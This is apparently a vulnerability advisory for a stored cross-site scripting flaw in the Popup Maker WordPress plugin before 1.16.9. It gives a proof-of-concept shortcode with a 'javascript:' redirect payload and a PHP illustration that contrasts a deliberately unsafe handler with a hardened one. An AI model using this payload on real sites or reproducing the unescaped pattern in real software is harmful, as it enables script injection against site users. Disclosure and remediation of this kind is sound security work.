wpexploit | An Doan | WPEX-ID: 8BF8EBE8-1063-492D-A0F9-2F824408D0DF
History: Sep 23, 2022 - 12:00 a.m.

Popup Maker < 1.16.9 - Contributor+ Stored XSS via Subscription Form

2022-09-23 00:00:00
An Doan
125

EPSS: 0.001 (Low)
EPSS Percentile: 23.5%

The plugin does not validate or escape one of its shortcode attributes, which could allow users with a role as low as Contributor to perform stored cross-site scripting attacks.

As a Contributor, put the following shortcode in a post/page:

[pum_sub_form name_field_type="fullname" label_name="Name" label_email="Email" label_submit="Subscribe" placeholder_name="Name" placeholder_email="Email" form_layout="block" form_alignment="center" form_style="default" privacy_consent_enabled="yes" privacy_consent_label="Notify me about related content and special offers." privacy_consent_type="radio" privacy_consent_radio_layout="inline" privacy_consent_yes_label="Yes" privacy_consent_no_label="No" privacy_usage_text="If you opt in above we use this information send related content, discounts and other special offers." redirect_enabled redirect="javascript:alert(/XSS/)"] 

The XSS is triggered when the post/page is previewed or viewed and the form is submitted.
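As an added illustration (not Popup Maker's own code), a hypothetical PHP shortcode handler that shows the unescaped-output pattern the advisory describes next to a hardened version that accepts only http(s) or site-relative redirect targets. The function names, the form markup and the way attributes are passed in are assumptions; it runs with the plain PHP CLI.

```php
<?php
// Added example, not Popup Maker's own code: a hypothetical shortcode handler
// that writes the `redirect` attribute into the form markup.

// Unsafe pattern: the attribute value is trusted and emitted verbatim, so a
// javascript: URL reaches the browser and runs when the form submits.
function render_form_unsafe(array $atts): string {
    $redirect = $atts['redirect'] ?? '';
    return '<form data-redirect="' . $redirect . '">...</form>';
}

// Hardened: accept only absolute http(s) URLs or site-relative paths and drop
// everything else (javascript:, data:, vbscript:, protocol-relative //host).
// In a WordPress plugin, esc_url() and wp_http_validate_url() fill this role.
function sanitize_redirect(string $url): string {
    $url = trim($url);
    if ($url === '') {
        return '';
    }
    // Site-relative path such as /thanks/, but not protocol-relative //host.
    if ($url[0] === '/' && substr($url, 0, 2) !== '//') {
        return htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return '';
    }
    // Scheme allow-list: obfuscated schemes (e.g. "java\tscript") fail here.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return '';
    }
    return htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
}

function render_form_safe(array $atts): string {
    $redirect = sanitize_redirect((string) ($atts['redirect'] ?? ''));
    $markup = '<form';
    if (isset($atts['redirect_enabled']) && $redirect !== '') {
        $markup .= ' data-redirect="' . $redirect . '"';
    }
    return $markup . '>...</form>';
}

// Constructed inputs: the advisory's payload and a legitimate target.
$attack = ['redirect_enabled' => true, 'redirect' => 'javascript:alert(/XSS/)'];
$benign = ['redirect_enabled' => true, 'redirect' => 'https://example.com/ok?a=1&b=2'];
echo render_form_unsafe($attack), "\n"; // javascript: URL lands in the markup
echo render_form_safe($attack), "\n";   // data-redirect attribute is omitted
echo render_form_safe($benign), "\n";   // https URL kept, attribute-escaped
```

A relative target without a leading slash (e.g. "thanks") is also rejected by this allow-list; loosen that deliberately if the plugin needs it rather than by accepting arbitrary schemes.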

